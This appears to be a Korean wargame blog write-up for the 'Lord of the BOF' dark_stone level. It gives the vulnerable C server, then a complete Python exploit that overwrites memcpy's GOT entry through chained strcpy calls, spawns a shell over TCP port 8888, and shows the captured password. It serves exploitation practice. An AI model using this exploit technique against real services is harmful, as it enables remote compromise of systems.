/* The Lord of the BOF : The Fellowship of the BOF - dark_stone - Remote BOF on Fedora Core 3 - hint : GOT overwriting again - port : TCP 8888 */ #include <stdio.h> // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main() { char buffer[256]; char saved_sfp[4]; int length; char temp[1024]; printf("dark_stone : how fresh meat you are!\n"); printf("you : "); fflush(stdout); // give me a food fgets(temp, 1024, stdin); // for disturbance RET sleding length = strlen(temp); // save sfp memcpy(saved_sfp, buffer+264, 4); // overflow!! strcpy(buffer, temp); // restore sfp memcpy(buffer+264, saved_sfp, 4); // disturbance RET sleding memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length)); // buffer cleaning memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000); printf("%s\n", buffer); }
다른점은 remote 라는것밖에 다른게 없다.
슈퍼데몬이라서 공격방법은 똑같고, 소켓으로 보내는점만 다르다.
이전 단계의 exploit에서 주소들만 수정해주고, 소켓으로 보내면 된다.
import os import struct from socket import * def L_E(number): return struct.pack('<I',number) PPR = 0x80484f3 # pop-pop-ret STRCPY = 0x8048438 MEMCPY = 0x8048418 MEMCPY_GOT = 0x8049850 BINSH = 0x8049878 str_c0 = 0x80484c8+8 str_07 = 0x8048178+4 str_75 = 0x80482b4 str_00 = 0x8048138 str_slash = 0x8048114 str_b = 0x8048114+3 str_i = 0x8048114+2 str_n = 0x8048114+10 str_s = 0x8048740+6 str_h = 0x80481b4+4 payload = 'A'*268 payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(MEMCPY_GOT) payload += L_E(str_c0) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(MEMCPY_GOT+1) payload += L_E(str_07) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(MEMCPY_GOT+2) payload += L_E(str_75) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(MEMCPY_GOT+3) payload += L_E(str_00) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH) payload += L_E(str_slash) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+1) payload += L_E(str_b) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+2) payload += L_E(str_i) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+3) payload += L_E(str_n) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+4) payload += L_E(str_slash) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+5) payload += L_E(str_s) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+6) payload += L_E(str_h) payload += L_E(STRCPY) payload += L_E(PPR) payload += L_E(BINSH+7) payload += L_E(str_00) payload += L_E(MEMCPY) payload += "AAAA" payload += L_E(BINSH) s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',8888)) s.send(payload+'\n') print s.recv(1024) while True: cmd = raw_input('$ ') if cmd == 'exit': s.close() break s.send(cmd+'\n') result = s.recv(1024) print result s.close()
$ python exploit.py dark_stone : how fresh meat you are! you : $ my-pass euid = 505 let there be light
'Computer Security > WarGame' 카테고리의 다른 글
| [BOF원정대/Fedora4] cruel -> enigma (5) | 2013.05.31 |
|---|---|
| [BOF원정대/Fedora4] dark_stone -> cruel (0) | 2013.05.09 |
| [BOF원정대/Fedora3] hell_fire -> evil_wizard (10) | 2013.05.07 |
| [BOF원정대/Fedora3] iron_golem -> dark_eyes (0) | 2012.12.22 |
| [BOF원정대/Fedora3] gate -> iron_golem (2) | 2012.12.22 |